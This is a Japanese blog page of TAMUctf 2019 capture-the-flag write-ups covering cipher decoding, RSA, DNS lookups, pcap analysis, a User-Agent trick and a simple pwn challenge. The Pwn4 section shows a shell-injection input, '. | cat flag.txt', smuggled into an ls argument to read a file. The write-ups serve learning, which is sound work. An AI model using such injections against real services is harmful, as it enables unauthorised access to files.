TAMUctf 19

TAMUctf 19 writeup Robots Rule

Robots Rule

277

http://web5.tamuctf.com

Difficulty: easy


robots.txtを参照してみます。次のページが表示されます。

1
Fiddlerでリクエストを編集して、User-AgentをGoogleの検索Botに変えてアクセスしてみます。

2

フラグが表示されました。
フラグは、
gigem{be3p-bOop_rob0tz_4-lyfe}
です。



TAMUctf 19 writeup 0_Network_Enumeration

0_Network_Enumeration

100

Recently, the office put up a private webserver to store important information about the newest research project for the company. This information was to be kept confidential, as it's release could mean a large loss for everyone in the office.

Just as the research was about to be published, a competing firm published information eerily similar. Too similar...

Time to take a look through the office network logs to figure out what happened.

  1. What is the IP address of the private webserver?
  2. How many hosts made contact with the private webserver that day?

Difficulty: easy

pcapファイルをWiresharkで開きます。
1

8行目のHTTPのDestinationがwebserverです。
1のフラグは、
192.168.11.4
です。
[統計]-[対話]を選択します。IPv4タブとTCPタブのAddress Bが192.168.11.4である行のAddress Aの個数をカウントします。(たぶん)
2

3

10と3で13個です。
2のフラグは、
13
です。



TAMUctf 19 writeup -.-

-.-

391

To 1337-H4X0R:

Our coworker Bob loves a good classical cipher. Unfortunately, he also loves to send everything encrypted with these ciphers. Can you go ahead and decrypt this for me?

Difficulty: easy

flag.txtを確認すると、dahが長点、diまたはditが短点のモールス信号のようです。
dah-dah-dah-dah-dah dah-di-di-dah (略)
モールス信号としてデコードすると0Xで始まる16進文字列になります。2桁ずつ見てみるとASCIIコードのように見えますので、それを文字に変換します。
以上を行うpythonプログラムを書きます。
CODE = {'A': '.-',     'B': '-...',   'C': '-.-.', 
        'D': '-..',    'E': '.',      'F': '..-.',
        'G': '--.',    'H': '....',   'I': '..',
        'J': '.---',   'K': '-.-',    'L': '.-..',
        'M': '--',     'N': '-.',     'O': '---',
        'P': '.--.',   'Q': '--.-',   'R': '.-.',
        'S': '...',    'T': '-',      'U': '..-',
        'V': '...-',   'W': '.--',    'X': '-..-',
        'Y': '-.--',   'Z': '--..',
        
        '0': '-----',  '1': '.----',  '2': '..---',
        '3': '...--',  '4': '....-',  '5': '.....',
        '6': '-....',  '7': '--...',  '8': '---..',
        '9': '----.' 
        }

def decrypt(message): 
    message += ' '
    decipher = '' 
    citext = '' 
    for letter in message: 
        if (letter != ' '): 
            i = 0
            citext += letter 
        else: 
            i += 1
            if i == 2 : 
                decipher += ' '
            else: 
                decipher += list(CODE.keys())[list(CODE.values()).index(citext)] 
                citext = '' 
    return decipher 
    
a = ''
f = open('flag.txt')
s = f.read()
f.close()
l = s.split(' ')
for m in l:
m = m.replace('-', '').replace('dah', '-').replace('dit', '.').replace('di', '.')
a += decrypt(m)
print(a)
b = ''
for i in range(2, len(a), 2):
    b += chr(int(a[i:i+2], 16))
print(b)
実行すると次のようにフラグを得ることができます。
>python aaa.py
0X57702A6C58744751386538716E6D4D59552A737646486B6A49742A5251264A705A766A6D2125254B446B6670235E4E39666B346455346C423372546F5430505A516D4351454B5942345A4D762A21466B386C25626A716C504D6649476D612525467A4720676967656D7B433169634B5F636C31434B2D7930755F683476335F6D3449317D20757634767A4B5A7434796F6D694453684C6D385145466E5574774A404E754F59665826387540476E213125547176305663527A56216A217675757038426A644E49714535772324255634555A4F595A327A37543235743726784C40574F373431305149
Wp*lXtGQ8e8qnmMYU*svFHkjIt*RQ&JpZvjm!%%KDkfp#^N9fk4dU4lB3rToT0PZQmCQEKYB4ZMv*!Fk8l%bjqlPMfIGma%%FzG gigem{C1icK_cl1CK-y0u_h4v3_m4I1} uv4vzKZt4yomiDShLm8QEFnUtwJ@NuOYfX&8u@Gn!1%Tqv0VcRzV!j!vuup8BjdNIqE5w#$%V4UZOYZ2z7T25t7&xL@WO7410QI
フラグは、
gigem{C1icK_cl1CK-y0u_h4v3_m4I1}

TAMUctf 19 writeup Howdy!

Howdy!

1

Welcome to TAMUctf!
This year most of the challenges will be dynamically scored meaning the point value will adjust for everyone, including those have already solved the challenge, based on the number of solves.

The secure coding challenges will appear when you have solved their corresponding challenges.

If you have any questions or issues feel free to contact the devs on the discord.

Good luck and have fun!

The flag is: gigem{H0wdy!}

Difficulty: easy


フラグは、
gigem{H0wdy!}
です。



TAMUctf 19 writeup Who am I?

Who am I?

198

What is the A record for tamuctf.com?
(Not in standard gigem{flag} format)

Difficulty: easy


digコマンドを使います。
$ dig tamuctf.com
(略)
;; ANSWER SECTION:
tamuctf.com. 70910 IN A 52.33.57.247
(略)
フラグは、
52.33.57.247
です。

DNSがよくわかる教科書
株式会社日本レジストリサービス(JPRS) 渡邉結衣、佐藤新太、藤原和典
SBクリエイティブ
2018-11-22


TAMUctf 19 writeup Where am I?

Where am I?

309

What is the name of the city where the server for tamuctf.com is located?

(Not in standard gigem{flag} format)

Difficulty: easy

1

フラグは、
Boardman
です。

DNSがよくわかる教科書
株式会社日本レジストリサービス(JPRS) 渡邉結衣、佐藤新太、藤原和典
SBクリエイティブ
2018-11-22


TAMUctf 19 writeup RSAaaay

RSAaaay

363

Hey, you're a hacker, right? I think I am too, look at what I made!


(2531257, 43)

My super secret message: 906851 991083 1780304 2380434 438490 356019 921472 822283 817856 556932 2102538 2501908 2211404 991083 1562919 38268


Problem is, I don't remember how to decrypt it... could you help me out?

Difficulty: easy


(2531257, 43)を(n, e)とします。n=2531257をfactordbで素因数分解するとp = 509、q = 4973となります。暗号化されたメッセージをRSAで復号するPythonプログラムを作ります。
def exgcd(m, n):
  if n>0:
    y,x,d = exgcd(n, m%n)
    return x, y-m/n*x, d
  else:
    return 1, 0, m

n = 2531257
e = 43
c = [906851, 991083, 1780304, 2380434, 438490, 356019, 921472, 822283, 817856, 556932, 2102538, 2501908, 2211404, 991083, 1562919, 38268]

p = 509
q = 4973
d = exgcd(e, (p-1)*(q-1))[0] % ((p-1)*(q-1))
for a in c:
print(pow(a, d, n))
実行すると次の数列を得ることができます。ASCIIコードのようです。
$ python aaa.py
103
105103
101109
12383
97118
97103
10195
83105
12095
70108
121105
110103
9584
105103
101114
115125
ASCIIコードを文字に変換するPythonプログラムを書きます。
import sys

c = [103, 105, 103, 101, 109, 123, 83, 97, 118, 97, 103, 101, 95, 83, 105, 120, 95, 70, 108, 121, 105, 110, 103, 95, 84, 105, 103, 101, 114, 115, 125]
for a in c:
sys.stdout.write(chr(a))
実行するとフラグになります。
フラグは、
gigem{Savage_Six_Flying_Tigers}

TAMUctf 19 writeup Stop and Listen

Stop and Listen

343

Sometimes you just need to stop and listen.

This challenge is an introduction to our network exploit challenges, which are hosted over OpenVPN.

Instructions:

  • Install OpenVPN. Make sure to install the TAP driver.
  • Obtain your OpenVPN configuration in the challenge modal.
    • You will obtain a separate config for each challenge containing connection info and certificates for authentication.
  • Launch OpenVPN:
    • CLI: sudo openvpn --config ${challenge}.ovpn
    • Windows GUI: Place the config file in %HOMEPATH%\OpenVPN\config and right-click the VPN icon on the status bar, then select the config for this challenge

The virtual tap0 interface will be assigned the IP address 172.30.0.14/28 by default. If multiple team members connect you will need to choose a unique IP for both.

The standard subnet is 172.30.0.0/28, so give that a scan ;)

If you have any issues, please let me (nategraf) know in the Discord chat

Some tools to get started:

WiresharkでパケットをキャプチャするとUDPで次のメッセージが流れてきます。
(略)
"Of Life, the Universe and Everything..." said Deep Thought.
"Yes...!"
"Is..." said Deep Thought, and paused.
"Yes...!"
"Is..."
"Yes...!!!...?"
"gigem{f0rty_tw0_c9d950b61ea83}" said Deep Thought, with infinite majesty and calm.... 
...O Deep Thought computer," he said, "the task we have designed you to perform is this. We want you to tell us...." he paused, "The Answer."
(略)
フラグは、
gigem{f0rty_tw0_c9d950b61ea83}

TAMUctf 19 writeup Pwn4

Pwn4

287

nc pwn.tamuctf.com 4324

Difficulty: medium

接続してみます。
$ nc pwn.tamuctf.com 4324
ls as a service (laas)(Copyright pending)
Enter the arguments you would like to pass to ls:
lsコマンドのパラメータを要求しているようなので、.(ドット)を入力してみます。
.
Result of ls .:
flag.txt
pwn4
カレントディレクトリにflag.txtファイルがあることが分かります。パイプでつないでcatコマンドで見てみます。
ls as a service (laas)(Copyright pending)
Enter the arguments you would like to pass to ls:
. | cat flag.txt
Result of ls . | cat flag.txt:
gigem{5y573m_0v3rfl0w}
フラグが表示されました。
フラグは、
gigem{5y573m_0v3rfl0w}
です。



TAMUctf 19 writeup 0_intrusion

0_intrusion

100

Welcome to MicroServices inc, where do all things micro and service oriented!
Recently we got an alert saying there was suspicious traffic on one of our web servers. Can you help us out?

  1. What is the IP Address of the attacker?
pcapファイルをWiresharkで開きます。[統計]-[対話]を選択します。
1

10.83.20.77に対してポート22で接続しようとしている10.91.9.93が怪しいです。
フラグは、
10.91.9.93
です。



記事検索
ギャラリー
  • TetCTF 2023 NewYearBot
  • UUT CTF writeup Find The Password
  • UUT CTF writeup The Puzzle
  • Hack Zone Tunisia 2019 writeup Microscope
  • Hack Zone Tunisia 2019 writeup Welcome
  • SwampCTF 2019 writeup Brokerboard
  • SwampCTF 2019 writeup Leap of Faith
  • SwampCTF 2019 writeup Last Transmission
  • CBM CTF 2019 writeup Long road
カテゴリー